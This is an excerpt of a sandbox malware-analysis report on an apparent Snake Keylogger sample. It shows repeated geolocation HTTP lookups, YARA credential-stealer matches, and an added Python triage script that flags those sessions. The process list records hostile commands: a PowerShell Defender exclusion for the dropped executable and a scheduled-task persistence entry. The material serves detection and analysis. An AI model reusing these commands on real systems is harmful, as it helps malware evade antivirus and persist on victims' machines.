                                          2025-01-02 19:19:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.5 | 49776 | 188.114.97.3 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:54 UTC | 852 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160384
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkgEn3W8H6rYRfFR21At06cm40ETnnphrSxk2xhlIUZsjBtyrTBS4d%2B8xpexrlKcZiQAxePqgcphNLZ6EleUTmZgk1JqS2mYC3KBbrkc2ac9ler6ANPsbJ4Qk6%2Bg4CMdhguLiida"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a786ab0437a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=397820&cwnd=223&unsent_bytes=0&cid=0b3905842ea45169&ts=168&x=0"
                                          2025-01-02 19:19:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.5 | 49777 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:55 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:55 UTC | 855 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160384
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nasrSNpMhYEHXBAZg%2BSlqkBtqOaqXPLVq1c9QLZ1dtVkWWgIgv%2F58SXW3FntKZh3WsEnHC4J9FxWoNnwoDHODO6d4Kc8bRb1Z30FfkGs04dhtTKaSZghyhqZi9WM%2BWlQQwzaGvDt"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a7a1ce30cc2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1725&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1692753&cwnd=176&unsent_bytes=0&cid=388393efc53d12ee&ts=170&x=0"
                                          2025-01-02 19:19:55 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.5 | 49790 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:56 UTC | 861 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160385
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trnooTk1ndWaY9fjc5adIYiRnEHKLNz4n9btFTh6jf%2BDgPPA%2FiEvUrl0VT35UNlkthEjLoUq8yQ3vmu3YjCUO0URzR0%2FOhdBJv%2F64Iw%2B7JuQtvtsPwmD5nzT%2B6dje5RinuPfLHFN"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a8399ba0f3b-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1665&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=215&unsent_bytes=0&cid=10d78437e8167e82&ts=154&x=0"
                                          2025-01-02 19:19:56 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.5 | 49798 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:57 UTC | 857 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:57 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160386
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcRQUQ5R1ATmI7tn58LArvzR6Ktio%2Fh7e%2B9Y9eTMZmDUFryN7wKdNMUqrUVnOMSNIjaHJfOcUc5VuQ7b3YDB2ANsDm8kbdG0WKO%2B3CPhiLEpB4UtRl%2Bqpq54zPg9vUQxWsF9co7V"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a8a5bedef9f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1963&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449851&cwnd=219&unsent_bytes=0&cid=1d6361cacd34c289&ts=155&x=0"
                                          2025-01-02 19:19:57 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          15 | 192.168.2.5 | 49808 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:59 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:59 UTC | 855 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:59 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160388
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6NBncyh8ycHq9q1jLdAawIder5pdoyn6xeG4UEYjqiNim3BbKV9pJjaDOwUOvcEcvOogl9koDV063FcoDInjCrT0Qlb4RALnxNuKst2xxe%2Fo%2BrZsAu0lF9pGYLqqDKECOzR3yse"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a928c2a7c6c-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=4749&min_rtt=4749&rtt_var=2374&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=149368&cwnd=196&unsent_bytes=0&cid=33d502addb27c5c5&ts=195&x=0"
                                          2025-01-02 19:19:59 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

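The nine sessions above are one and the same request, sent within eight seconds from the two RegSvcs.exe PIDs, without a User-Agent header, to a public-IP geolocation service: this is the loop behind the report's "Tries to detect the country of the analysis system (by using the IP)" and "HTTP GET or POST without a user agent" signatures. The script below is an added example, not part of the Joe Sandbox report, showing how those observations become rules over HTTP session records. Its input is a constructed copy of sessions 7 to 15 (ids, PIDs, ports, timestamps and request bytes as tabulated) plus one invented benign browser session as a control; the geolocation hosts beyond reallyfreegeoip.org, the .NET images beyond RegSvcs.exe and the repeat threshold are assumptions.

```python
"""Rules over the HTTP session table: RegSvcs.exe repeatedly geolocating its own public IP.
Added example, not from the report. Session records below are constructed (see lead-in)."""
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class HttpSession:
    session_id: int
    timestamp: datetime
    pid: int
    process: str   # image path as the report prints it
    dst: str       # "ip:port"
    request: str   # request head exactly as sent (CRLF-delimited)


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
# The two request shapes in the table: 61 bytes without, 85 bytes with Connection: Keep-Alive.
GEO_REQ_61 = "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n\r\n"
GEO_REQ_85 = "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n"
BROWSER_REQ = "GET / HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\n\r\n"  # constructed

# Constructed sample mirroring sessions 7-15 of the report; session 99 is an invented control.
SESSIONS = [
    HttpSession(7,  _ts("2025-01-02 19:19:52"), 7276, REGSVCS, "188.114.97.3:443", GEO_REQ_61),
    HttpSession(8,  _ts("2025-01-02 19:19:52"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(9,  _ts("2025-01-02 19:19:53"), 7276, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(10, _ts("2025-01-02 19:19:53"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(11, _ts("2025-01-02 19:19:54"), 7276, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(12, _ts("2025-01-02 19:19:55"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(13, _ts("2025-01-02 19:19:56"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_61),
    HttpSession(14, _ts("2025-01-02 19:19:57"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(15, _ts("2025-01-02 19:19:59"), 7620, REGSVCS, "188.114.97.3:443", GEO_REQ_85),
    HttpSession(99, _ts("2025-01-02 19:20:30"), 4242, r"C:\Program Files\Browser\browser.exe",
                "203.0.113.10:443", BROWSER_REQ),
]

GEOLOCATION_HOSTS = {"reallyfreegeoip.org"}           # from the page; extend as needed (assumption)
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe",          # RegSvcs.exe is on the page; the other
                   "installutil.exe", "msbuild.exe"}     # .NET utilities are assumed additions


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a request head into (method, path, headers); header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def triage(sessions: list[HttpSession], beacon_threshold: int = 3) -> dict[int, list[str]]:
    """Return {session_id: [reasons]} for every session that trips at least one rule."""
    parsed = {s.session_id: parse_request(s.request) for s in sessions}
    # The same (pid, host, path) seen again and again is a check-in loop, not a one-off lookup.
    repeats = Counter((s.pid, parsed[s.session_id][2].get("host", ""), parsed[s.session_id][1])
                      for s in sessions)
    findings: dict[int, list[str]] = {}
    for s in sessions:
        method, path, headers = parsed[s.session_id]
        host = headers.get("host", "")
        image = s.process.rsplit("\\", 1)[-1].lower()
        reasons = []
        if "user-agent" not in headers:
            reasons.append(f"{method} without a User-Agent header")
        if host in GEOLOCATION_HOSTS:
            reasons.append(f"public-IP geolocation lookup: {host}{path}")
        if image in INJECTION_HOSTS:
            reasons.append(f"HTTP client is {image}, a .NET tool that should never reach the network")
        n = repeats[(s.pid, host, path)]
        if n >= beacon_threshold:
            reasons.append(f"same request repeated {n}x by PID {s.pid}")
        if reasons:
            findings[s.session_id] = reasons
    return findings


if __name__ == "__main__":
    for sid, reasons in sorted(triage(SESSIONS).items()):
        print(f"session {sid}: " + "; ".join(reasons))
```

Run stand-alone it prints four reasons for each of sessions 7 to 15 and nothing for the control; the 61- and 85-byte request constants reproduce the "Bytes transferred" values in the table, which is how the exact header shape can be confirmed from the report alone. On a live host the per-(pid, host, path) counter is the signal to key on: one geolocation lookup is common in legitimate software, a tight loop of them from a .NET framework utility is not.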

                                          Target ID:0
                                          Start time:14:19:40
                                          Start date:02/01/2025
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x510000
                                          File size:698'376 bytes
                                          MD5 hash:92E84C83303CDC492EAAED0E1E4B79C6
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:14:19:42
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
                                          Imagebase:0xa80000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
                                          Imagebase:0x840000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xfb0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:14:19:43
                                          Start date:02/01/2025
                                          Path:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          Imagebase:0x520000
                                          File size:698'376 bytes
                                          MD5 hash:92E84C83303CDC492EAAED0E1E4B79C6
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 71%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:9
                                          Start time:14:19:44
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
